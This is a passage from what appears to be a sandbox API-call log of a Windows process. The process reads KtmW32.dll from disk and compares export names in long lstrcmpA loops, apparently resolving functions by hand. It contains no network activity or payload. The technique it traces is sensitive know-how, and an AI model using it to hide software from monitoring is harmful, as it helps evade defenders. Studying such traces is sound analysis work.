lpString2="ArrangeIconicWindows") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0278.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0279.293] GetProcessHeap () returned 0x470000 [0279.293] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c6040 | out: hHeap=0x470000) returned 1 [0279.302] GetProcessHeap () returned 0x470000 [0279.302] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489020 [0279.302] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0279.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0279.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0279.306] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0279.307] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0279.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0279.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0279.308] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0279.308] GetProcessHeap () returned 0x470000 [0279.308] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5e00) returned 0x2d05030 [0279.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0279.308] ReadFile (in: hFile=0x17c, lpBuffer=0x2d05030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d05030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0279.309] CloseHandle (hObject=0x17c) returned 1 [0279.309] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0279.309] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0279.309] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0279.309] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0279.309] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0279.309] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0279.309] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0279.309] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0279.309] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0279.309] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0279.309] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0279.309] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0279.310] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0279.310] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0279.310] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0279.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0279.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0279.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0279.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0279.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0279.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0279.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0279.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0279.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0279.310] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0279.310] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0279.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0279.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0279.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0279.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0279.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0279.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0279.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0279.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0279.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0279.312] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0279.312] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.312] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0279.312] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0279.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.313] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0279.313] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.313] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0279.313] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0279.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0279.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0279.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0279.314] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0279.314] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0279.314] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0279.314] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0279.314] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0279.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0279.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0279.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0279.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0279.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0279.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0279.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0279.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0279.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0279.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0279.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0279.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0279.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0279.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0279.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0279.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0279.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0279.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0279.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0279.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0279.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0279.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0279.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0279.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0279.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0279.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0279.319] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0279.319] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0279.319] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0279.319] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0279.319] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0279.319] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0279.441] GetProcessHeap () returned 0x470000 [0279.441] HeapFree 